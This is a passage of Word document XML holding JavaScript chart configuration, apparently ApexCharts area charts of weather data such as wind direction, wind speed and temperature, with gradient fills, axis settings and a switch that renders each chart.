      </w:pPr>
      <w:r w:rsidRPr="00BD3B49">
        <w:t xml:space="preserve">                        {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25500747" w14:textId="77777777" w:rsidR="0093378B" w:rsidRPr="00BD3B49" w:rsidRDefault="0093378B" w:rsidP="00BD3B49">
      <w:pPr>
        <w:pStyle w:val="a9"/>
      </w:pPr>
      <w:r w:rsidRPr="00BD3B49">
        <w:t xml:space="preserve">                            name: "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>направление</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00BD3B49">
        <w:t xml:space="preserve"> (sin)",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A33EEA3" w14:textId="77777777" w:rsidR="0093378B" w:rsidRPr="00BD3B49" w:rsidRDefault="0093378B" w:rsidP="00BD3B49">
      <w:pPr>
        <w:pStyle w:val="a9"/>
      </w:pPr>
      <w:r w:rsidRPr="00BD3B49">
        <w:t xml:space="preserve">                            data: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00BD3B49">
        <w:t>chartWindDirData</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="05568D67" w14:textId="77777777" w:rsidR="0093378B" w:rsidRPr="00BD3B49" w:rsidRDefault="0093378B" w:rsidP="00BD3B49">
      <w:pPr>
        <w:pStyle w:val="a9"/>
      </w:pPr>
      <w:r w:rsidRPr="00BD3B49">
        <w:t xml:space="preserve">                        }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="647B6602" w14:textId="77777777" w:rsidR="0093378B" w:rsidRPr="00BD3B49" w:rsidRDefault="0093378B" w:rsidP="00BD3B49">
      <w:pPr>
        <w:pStyle w:val="a9"/>
      </w:pPr>
      <w:r w:rsidRPr="00BD3B49">
        <w:t xml:space="preserve">                    ],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D054067" w14:textId="77777777" w:rsidR="0093378B" w:rsidRPr="00BD3B49" w:rsidRDefault="0093378B" w:rsidP="00BD3B49">
      <w:pPr>
        <w:pStyle w:val="a9"/>
      </w:pPr>
      <w:r w:rsidRPr="00BD3B49">
        <w:t xml:space="preserve">                    fill: {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D849BE9" w14:textId="77777777" w:rsidR="0093378B" w:rsidRPr="00BD3B49" w:rsidRDefault="0093378B" w:rsidP="00BD3B49">
      <w:pPr>
        <w:pStyle w:val="a9"/>
      </w:pPr>
      <w:r w:rsidRPr="00BD3B49">
        <w:t xml:space="preserve">                        type: "gradient",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="635E3A72" w14:textId="77777777" w:rsidR="0093378B" w:rsidRPr="00BD3B49" w:rsidRDefault="0093378B" w:rsidP="00BD3B49">
      <w:pPr>
        <w:pStyle w:val="a9"/>
      </w:pPr>
      <w:r w:rsidRPr="00BD3B49">
        <w:t xml:space="preserve">                        gradient: {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30F50A8C" w14:textId="77777777" w:rsidR="0093378B" w:rsidRPr="00BD3B49" w:rsidRDefault="0093378B" w:rsidP="00BD3B49">
      <w:pPr>
        <w:pStyle w:val="a9"/>
      </w:pPr>
      <w:r w:rsidRPr="00BD3B49">
        <w:t xml:space="preserve">                            </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00BD3B49">
        <w:t>shadeIntensity</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00BD3B49">
        <w:t>: 1,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43A25C40" w14:textId="77777777" w:rsidR="0093378B" w:rsidRPr="00BD3B49" w:rsidRDefault="0093378B" w:rsidP="00BD3B49">
      <w:pPr>
        <w:pStyle w:val="a9"/>
      </w:pPr>
      <w:r w:rsidRPr="00BD3B49">
        <w:t xml:space="preserve">                            </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00BD3B49">
        <w:t>opacityFrom</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00BD3B49">
        <w:t>: 0.7,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46B9D05A" w14:textId="77777777" w:rsidR="0093378B" w:rsidRPr="00BD3B49" w:rsidRDefault="0093378B" w:rsidP="00BD3B49">
      <w:pPr>
        <w:pStyle w:val="a9"/>
      </w:pPr>
      <w:r w:rsidRPr="00BD3B49">
        <w:t xml:space="preserve">                            </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00BD3B49">
        <w:t>opacityTo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00BD3B49">
        <w:t>: 0.9,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="617AE303" w14:textId="77777777" w:rsidR="0093378B" w:rsidRPr="00BD3B49" w:rsidRDefault="0093378B" w:rsidP="00BD3B49">
      <w:pPr>
        <w:pStyle w:val="a9"/>
      </w:pPr>
      <w:r w:rsidRPr="00BD3B49">
        <w:t xml:space="preserve">                            stops: [0, 90, 100]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4263CD85" w14:textId="77777777" w:rsidR="0093378B" w:rsidRPr="00BD3B49" w:rsidRDefault="0093378B" w:rsidP="00BD3B49">
      <w:pPr>
        <w:pStyle w:val="a9"/>
      </w:pPr>
      <w:r w:rsidRPr="00BD3B49">
        <w:t xml:space="preserve">                        }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09D04295" w14:textId="77777777" w:rsidR="0093378B" w:rsidRPr="00BD3B49" w:rsidRDefault="0093378B" w:rsidP="00BD3B49">
      <w:pPr>
        <w:pStyle w:val="a9"/>
      </w:pPr>
      <w:r w:rsidRPr="00BD3B49">
        <w:t xml:space="preserve">                    },</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15970AC0"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E841933" w14:textId="77777777" w:rsidR="0093378B" w:rsidRPr="00BD3B49" w:rsidRDefault="0093378B" w:rsidP="00BD3B49">
      <w:pPr>
        <w:pStyle w:val="a9"/>
      </w:pPr>
      <w:r w:rsidRPr="00BD3B49">
        <w:t xml:space="preserve">                        categories: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00BD3B49">
        <w:t>chartLabels</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00BD3B49">
        <w:t>,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CC7B53D" w14:textId="77777777" w:rsidR="0093378B" w:rsidRPr="00BD3B49" w:rsidRDefault="0093378B" w:rsidP="00BD3B49">
      <w:pPr>
        <w:pStyle w:val="a9"/>
      </w:pPr>
      <w:r w:rsidRPr="00BD3B49">
        <w:t xml:space="preserve">                        labels: {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6480945D" w14:textId="77777777" w:rsidR="0093378B" w:rsidRPr="00BD3B49" w:rsidRDefault="0093378B" w:rsidP="00BD3B49">
      <w:pPr>
        <w:pStyle w:val="a9"/>
      </w:pPr>
      <w:r w:rsidRPr="00BD3B49">
        <w:t xml:space="preserve">                            rotate: -45</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33C89E42" w14:textId="77777777" w:rsidR="0093378B" w:rsidRPr="00BD3B49" w:rsidRDefault="0093378B" w:rsidP="00BD3B49">
      <w:pPr>
        <w:pStyle w:val="a9"/>
      </w:pPr>
      <w:r w:rsidRPr="00BD3B49">
        <w:t xml:space="preserve">                        }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="326C2816" w14:textId="77777777" w:rsidR="0093378B" w:rsidRPr="00BD3B49" w:rsidRDefault="0093378B" w:rsidP="00BD3B49">
      <w:pPr>
        <w:pStyle w:val="a9"/>
      </w:pPr>
      <w:r w:rsidRPr="00BD3B49">
        <w:t xml:space="preserve">                    },</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A4AB339" w14:textId="77777777" w:rsidR="0093378B" w:rsidRPr="00BD3B49" w:rsidRDefault="0093378B" w:rsidP="00BD3B49">
      <w:pPr>
        <w:pStyle w:val="a9"/>
      </w:pPr>
      <w:r w:rsidRPr="00BD3B49">
        <w:t xml:space="preserve">                    </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00BD3B49">
        <w:t>yaxis</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00BD3B49">
        <w:t>: {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1ECA8CBE" w14:textId="77777777" w:rsidR="0093378B" w:rsidRPr="00BD3B49" w:rsidRDefault="0093378B" w:rsidP="00BD3B49">
      <w:pPr>
        <w:pStyle w:val="a9"/>
      </w:pPr>
      <w:r w:rsidRPr="00BD3B49">
        <w:t xml:space="preserve">                        max: 400</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B861263" w14:textId="77777777" w:rsidR="0093378B" w:rsidRPr="00BD3B49" w:rsidRDefault="0093378B" w:rsidP="00BD3B49">
      <w:pPr>
        <w:pStyle w:val="a9"/>
      </w:pPr>
      <w:r w:rsidRPr="00BD3B49">
        <w:t xml:space="preserve">                    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="417C571A" w14:textId="77777777" w:rsidR="0093378B" w:rsidRPr="00BD3B49" w:rsidRDefault="0093378B" w:rsidP="00BD3B49">
      <w:pPr>
        <w:pStyle w:val="a9"/>
      </w:pPr>
      <w:r w:rsidRPr="00BD3B49">
        <w:t xml:space="preserve">                };</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A2652F1" w14:textId="77777777" w:rsidR="0093378B" w:rsidRPr="00BD3B49" w:rsidRDefault="0093378B" w:rsidP="00BD3B49">
      <w:pPr>
        <w:pStyle w:val="a9"/>
      </w:pPr>
      <w:r w:rsidRPr="00BD3B49">
        <w:t xml:space="preserve">            }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B48C0DE" w14:textId="77777777" w:rsidR="0093378B" w:rsidRPr="00BD3B49" w:rsidRDefault="0093378B" w:rsidP="00BD3B49">
      <w:pPr>
        <w:pStyle w:val="a9"/>
      </w:pPr>
      <w:r w:rsidRPr="00BD3B49">
        <w:t xml:space="preserve">            else {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="011BCBE9" w14:textId="77777777" w:rsidR="0093378B" w:rsidRPr="00BD3B49" w:rsidRDefault="0093378B" w:rsidP="00BD3B49">
      <w:pPr>
        <w:pStyle w:val="a9"/>
      </w:pPr>
      <w:r w:rsidRPr="00BD3B49">
        <w:t xml:space="preserve">                </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00BD3B49">
        <w:t>chartMatter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00BD3B49">
        <w:t xml:space="preserve"> = {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="226A5328" w14:textId="77777777" w:rsidR="0093378B" w:rsidRPr="00BD3B49" w:rsidRDefault="0093378B" w:rsidP="00BD3B49">
      <w:pPr>
        <w:pStyle w:val="a9"/>
      </w:pPr>
      <w:r w:rsidRPr="00BD3B49">
        <w:t xml:space="preserve">                    chart: {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6404F122" w14:textId="77777777" w:rsidR="0093378B" w:rsidRPr="00BD3B49" w:rsidRDefault="0093378B" w:rsidP="00BD3B49">
      <w:pPr>
        <w:pStyle w:val="a9"/>
      </w:pPr>
      <w:r w:rsidRPr="00BD3B49">
        <w:t xml:space="preserve">                        height: 280,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CA39542" w14:textId="77777777" w:rsidR="0093378B" w:rsidRPr="00BD3B49" w:rsidRDefault="0093378B" w:rsidP="00BD3B49">
      <w:pPr>
        <w:pStyle w:val="a9"/>
      </w:pPr>
      <w:r w:rsidRPr="00BD3B49">
        <w:t xml:space="preserve">                        type: "area"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AA1D65A" w14:textId="77777777" w:rsidR="0093378B" w:rsidRPr="00BD3B49" w:rsidRDefault="0093378B" w:rsidP="00BD3B49">
      <w:pPr>
        <w:pStyle w:val="a9"/>
      </w:pPr>
      <w:r w:rsidRPr="00BD3B49">
        <w:t xml:space="preserve">                    },</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DA8F836" w14:textId="77777777" w:rsidR="0093378B" w:rsidRPr="00BD3B49" w:rsidRDefault="0093378B" w:rsidP="00BD3B49">
      <w:pPr>
        <w:pStyle w:val="a9"/>
      </w:pPr>
      <w:r w:rsidRPr="00BD3B49">
        <w:t xml:space="preserve">                    </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00BD3B49">
        <w:t>dataLabels</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00BD3B49">
        <w:t>: {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66470E53" w14:textId="77777777" w:rsidR="0093378B" w:rsidRPr="00BD3B49" w:rsidRDefault="0093378B" w:rsidP="00BD3B49">
      <w:pPr>
        <w:pStyle w:val="a9"/>
      </w:pPr>
      <w:r w:rsidRPr="00BD3B49">
        <w:t xml:space="preserve">                        enabled: false</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EFD76C5" w14:textId="77777777" w:rsidR="0093378B" w:rsidRPr="00BD3B49" w:rsidRDefault="0093378B" w:rsidP="00BD3B49">
      <w:pPr>
        <w:pStyle w:val="a9"/>
      </w:pPr>
      <w:r w:rsidRPr="00BD3B49">
        <w:t xml:space="preserve">                    },</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CC23DA1" w14:textId="77777777" w:rsidR="0093378B" w:rsidRPr="00BD3B49" w:rsidRDefault="0093378B" w:rsidP="00BD3B49">
      <w:pPr>
        <w:pStyle w:val="a9"/>
      </w:pPr>
      <w:r w:rsidRPr="00BD3B49">
        <w:t xml:space="preserve">                    series: [</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72C33010" w14:textId="77777777" w:rsidR="0093378B" w:rsidRPr="00BD3B49" w:rsidRDefault="0093378B" w:rsidP="00BD3B49">
      <w:pPr>
        <w:pStyle w:val="a9"/>
      </w:pPr>
      <w:r w:rsidRPr="00BD3B49">
        <w:t xml:space="preserve">                        {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4517C947" w14:textId="77777777" w:rsidR="0093378B" w:rsidRPr="00BD3B49" w:rsidRDefault="0093378B" w:rsidP="00BD3B49">
      <w:pPr>
        <w:pStyle w:val="a9"/>
      </w:pPr>
      <w:r w:rsidRPr="00BD3B49">
        <w:t xml:space="preserve">                            name: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00BD3B49">
        <w:t>seriesName</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00BD3B49">
        <w:t>,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C917F30" w14:textId="77777777" w:rsidR="0093378B" w:rsidRPr="00BD3B49" w:rsidRDefault="0093378B" w:rsidP="00BD3B49">
      <w:pPr>
        <w:pStyle w:val="a9"/>
      </w:pPr>
      <w:r w:rsidRPr="00BD3B49">
        <w:t xml:space="preserve">                            data: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00BD3B49">
        <w:t>chartData</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="34C91879" w14:textId="77777777" w:rsidR="0093378B" w:rsidRPr="00BD3B49" w:rsidRDefault="0093378B" w:rsidP="00BD3B49">
      <w:pPr>
        <w:pStyle w:val="a9"/>
      </w:pPr>
      <w:r w:rsidRPr="00BD3B49">
        <w:t xml:space="preserve">                        }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21BCB11A" w14:textId="77777777" w:rsidR="0093378B" w:rsidRPr="00BD3B49" w:rsidRDefault="0093378B" w:rsidP="00BD3B49">
      <w:pPr>
        <w:pStyle w:val="a9"/>
      </w:pPr>
      <w:r w:rsidRPr="00BD3B49">
        <w:t xml:space="preserve">                    ],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EE2EF6F" w14:textId="77777777" w:rsidR="0093378B" w:rsidRPr="00BD3B49" w:rsidRDefault="0093378B" w:rsidP="00BD3B49">
      <w:pPr>
        <w:pStyle w:val="a9"/>
      </w:pPr>
      <w:r w:rsidRPr="00BD3B49">
        <w:t xml:space="preserve">                    fill: {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43086FFB" w14:textId="77777777" w:rsidR="0093378B" w:rsidRPr="00BD3B49" w:rsidRDefault="0093378B" w:rsidP="00BD3B49">
      <w:pPr>
        <w:pStyle w:val="a9"/>
      </w:pPr>
      <w:r w:rsidRPr="00BD3B49">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">                        type: "gradient",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35BCD749" w14:textId="77777777" w:rsidR="0093378B" w:rsidRPr="00BD3B49" w:rsidRDefault="0093378B" w:rsidP="00BD3B49">
      <w:pPr>
        <w:pStyle w:val="a9"/>
      </w:pPr>
      <w:r w:rsidRPr="00BD3B49">
        <w:t xml:space="preserve">                        gradient: {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="289BE2F6" w14:textId="77777777" w:rsidR="0093378B" w:rsidRPr="00BD3B49" w:rsidRDefault="0093378B" w:rsidP="00BD3B49">
      <w:pPr>
        <w:pStyle w:val="a9"/>
      </w:pPr>
      <w:r w:rsidRPr="00BD3B49">
        <w:t xml:space="preserve">                            </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00BD3B49">
        <w:t>shadeIntensity</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00BD3B49">
        <w:t>: 1,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F5ED03B" w14:textId="77777777" w:rsidR="0093378B" w:rsidRPr="00BD3B49" w:rsidRDefault="0093378B" w:rsidP="00BD3B49">
      <w:pPr>
        <w:pStyle w:val="a9"/>
      </w:pPr>
      <w:r w:rsidRPr="00BD3B49">
        <w:t xml:space="preserve">                            </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00BD3B49">
        <w:t>opacityFrom</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00BD3B49">
        <w:t>: 0.7,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7367519B" w14:textId="77777777" w:rsidR="0093378B" w:rsidRPr="00BD3B49" w:rsidRDefault="0093378B" w:rsidP="00BD3B49">
      <w:pPr>
        <w:pStyle w:val="a9"/>
      </w:pPr>
      <w:r w:rsidRPr="00BD3B49">
        <w:t xml:space="preserve">                            </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00BD3B49">
        <w:t>opacityTo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00BD3B49">
        <w:t>: 0.9,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DB28FFB" w14:textId="77777777" w:rsidR="0093378B" w:rsidRPr="00BD3B49" w:rsidRDefault="0093378B" w:rsidP="00BD3B49">
      <w:pPr>
        <w:pStyle w:val="a9"/>
      </w:pPr>
      <w:r w:rsidRPr="00BD3B49">
        <w:t xml:space="preserve">                            stops: [0, 90, 100]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="264A86F2" w14:textId="77777777" w:rsidR="0093378B" w:rsidRPr="00BD3B49" w:rsidRDefault="0093378B" w:rsidP="00BD3B49">
      <w:pPr>
        <w:pStyle w:val="a9"/>
      </w:pPr>
      <w:r w:rsidRPr="00BD3B49">
        <w:t xml:space="preserve">                        }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1427C7EF" w14:textId="77777777" w:rsidR="0093378B" w:rsidRPr="00BD3B49" w:rsidRDefault="0093378B" w:rsidP="00BD3B49">
      <w:pPr>
        <w:pStyle w:val="a9"/>
      </w:pPr>
      <w:r w:rsidRPr="00BD3B49">
        <w:t xml:space="preserve">                    },</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="552DE361"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C78EBFC" w14:textId="77777777" w:rsidR="0093378B" w:rsidRPr="00BD3B49" w:rsidRDefault="0093378B" w:rsidP="00BD3B49">
      <w:pPr>
        <w:pStyle w:val="a9"/>
      </w:pPr>
      <w:r w:rsidRPr="00BD3B49">
        <w:t xml:space="preserve">                        categories: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00BD3B49">
        <w:t>chartLabels</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00BD3B49">
        <w:t>,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26020408" w14:textId="77777777" w:rsidR="0093378B" w:rsidRPr="00BD3B49" w:rsidRDefault="0093378B" w:rsidP="00BD3B49">
      <w:pPr>
        <w:pStyle w:val="a9"/>
      </w:pPr>
      <w:r w:rsidRPr="00BD3B49">
        <w:t xml:space="preserve">                        labels: {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36616672" w14:textId="77777777" w:rsidR="0093378B" w:rsidRPr="00BD3B49" w:rsidRDefault="0093378B" w:rsidP="00BD3B49">
      <w:pPr>
        <w:pStyle w:val="a9"/>
      </w:pPr>
      <w:r w:rsidRPr="00BD3B49">
        <w:t xml:space="preserve">                            rotate: -45</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51A3FE74" w14:textId="77777777" w:rsidR="0093378B" w:rsidRPr="00BD3B49" w:rsidRDefault="0093378B" w:rsidP="00BD3B49">
      <w:pPr>
        <w:pStyle w:val="a9"/>
      </w:pPr>
      <w:r w:rsidRPr="00BD3B49">
        <w:t xml:space="preserve">                        }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B657638" w14:textId="77777777" w:rsidR="0093378B" w:rsidRPr="00BD3B49" w:rsidRDefault="0093378B" w:rsidP="00BD3B49">
      <w:pPr>
        <w:pStyle w:val="a9"/>
      </w:pPr>
      <w:r w:rsidRPr="00BD3B49">
        <w:t xml:space="preserve">                    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E750029" w14:textId="77777777" w:rsidR="0093378B" w:rsidRPr="00BD3B49" w:rsidRDefault="0093378B" w:rsidP="00BD3B49">
      <w:pPr>
        <w:pStyle w:val="a9"/>
      </w:pPr>
      <w:r w:rsidRPr="00BD3B49">
        <w:t xml:space="preserve">                };</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0993F91E" w14:textId="77777777" w:rsidR="0093378B" w:rsidRPr="00BD3B49" w:rsidRDefault="0093378B" w:rsidP="00BD3B49">
      <w:pPr>
        <w:pStyle w:val="a9"/>
      </w:pPr>
      <w:r w:rsidRPr="00BD3B49">
        <w:t xml:space="preserve">            }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CC8ADAC" w14:textId="77777777" w:rsidR="0093378B" w:rsidRPr="00BD3B49" w:rsidRDefault="0093378B" w:rsidP="00BD3B49">
      <w:pPr>
        <w:pStyle w:val="a9"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="09BB54B0" w14:textId="77777777" w:rsidR="0093378B" w:rsidRPr="00BD3B49" w:rsidRDefault="0093378B" w:rsidP="00BD3B49">
      <w:pPr>
        <w:pStyle w:val="a9"/>
      </w:pPr>
      <w:r w:rsidRPr="00BD3B49">
        <w:t xml:space="preserve">            switch (type) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72AC9610"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6205D181" w14:textId="77777777" w:rsidR="0093378B" w:rsidRPr="00BD3B49" w:rsidRDefault="0093378B" w:rsidP="00BD3B49">
      <w:pPr>
        <w:pStyle w:val="a9"/>
      </w:pPr>
      <w:r w:rsidRPr="00BD3B49">
        <w:t xml:space="preserve">                    </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00BD3B49">
        <w:t>chartTwin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433F12" w14:textId="77777777" w:rsidR="0093378B" w:rsidRPr="00BD3B49" w:rsidRDefault="0093378B" w:rsidP="00BD3B49">
      <w:pPr>
        <w:pStyle w:val="a9"/>
      </w:pPr>
      <w:r w:rsidRPr="00BD3B49">
        <w:t xml:space="preserve">                    </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00BD3B49">
        <w:t>chartTwind.render</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00BD3B49">
        <w:t>();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72D75D05" w14:textId="77777777" w:rsidR="0093378B" w:rsidRPr="00BD3B49" w:rsidRDefault="0093378B" w:rsidP="00BD3B49">
      <w:pPr>
        <w:pStyle w:val="a9"/>
      </w:pPr>
      <w:r w:rsidRPr="00BD3B49">
        <w:t xml:space="preserve">                    break;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B186D98"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033145E7" w14:textId="77777777" w:rsidR="0093378B" w:rsidRPr="00BD3B49" w:rsidRDefault="0093378B" w:rsidP="00BD3B49">
      <w:pPr>
        <w:pStyle w:val="a9"/>
      </w:pPr>
      <w:r w:rsidRPr="00BD3B49">
        <w:t xml:space="preserve">                    </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00BD3B49">
        <w:t>chartPwin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534EB1" w14:textId="77777777" w:rsidR="0093378B" w:rsidRPr="00BD3B49" w:rsidRDefault="0093378B" w:rsidP="00BD3B49">
      <w:pPr>
        <w:pStyle w:val="a9"/>
      </w:pPr>
      <w:r w:rsidRPr="00BD3B49">
        <w:t xml:space="preserve">                    </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00BD3B49">
        <w:t>chartPwind.render</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00BD3B49">
        <w:t>();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AFE9061" w14:textId="77777777" w:rsidR="0093378B" w:rsidRPr="00BD3B49" w:rsidRDefault="0093378B" w:rsidP="00BD3B49">
      <w:pPr>
        <w:pStyle w:val="a9"/>
      </w:pPr>
      <w:r w:rsidRPr="00BD3B49">
        <w:t xml:space="preserve">                    break;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72F5ACEE"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55F8228B" w14:textId="77777777" w:rsidR="0093378B" w:rsidRPr="00BD3B49" w:rsidRDefault="0093378B" w:rsidP="00BD3B49">
      <w:pPr>
        <w:pStyle w:val="a9"/>
      </w:pPr>
      <w:r w:rsidRPr="00BD3B49">
        <w:t xml:space="preserve">                    </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00BD3B49">
        <w:t>chartTpov</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2B52008B" w14:textId="77777777" w:rsidR="0093378B" w:rsidRPr="00BD3B49" w:rsidRDefault="0093378B" w:rsidP="00BD3B49">
      <w:pPr>
        <w:pStyle w:val="a9"/>
      </w:pPr>
      <w:r w:rsidRPr="00BD3B49">
        <w:t xml:space="preserve">                    </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00BD3B49">
        <w:t>chartTpov.render</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00BD3B49">
        <w:t>();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03EBAA5E" w14:textId="77777777" w:rsidR="0093378B" w:rsidRPr="00BD3B49" w:rsidRDefault="0093378B" w:rsidP="00BD3B49">
      <w:pPr>
        <w:pStyle w:val="a9"/>
      </w:pPr>
      <w:r w:rsidRPr="00BD3B49">
        <w:t xml:space="preserve">                    break;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02F391C6"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552C0031" w14:textId="77777777" w:rsidR="0093378B" w:rsidRPr="00BD3B49" w:rsidRDefault="0093378B" w:rsidP="00BD3B49">
      <w:pPr>
        <w:pStyle w:val="a9"/>
      </w:pPr>
      <w:r w:rsidRPr="00BD3B49">
        <w:t xml:space="preserve">                    </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00BD3B49">
        <w:t>charWindSpee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10388A" w14:textId="77777777" w:rsidR="0093378B" w:rsidRPr="00BD3B49" w:rsidRDefault="0093378B" w:rsidP="00BD3B49">
      <w:pPr>
        <w:pStyle w:val="a9"/>
      </w:pPr>
      <w:r w:rsidRPr="00BD3B49">
        <w:t xml:space="preserve">                    </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00BD3B49">
        <w:t>charWindSpeed.render</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00BD3B49">
        <w:t>();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D55BD5B" w14:textId="77777777" w:rsidR="0093378B" w:rsidRPr="00BD3B49" w:rsidRDefault="0093378B" w:rsidP="00BD3B49">
      <w:pPr>
        <w:pStyle w:val="a9"/>
      </w:pPr>
      <w:r w:rsidRPr="00BD3B49">
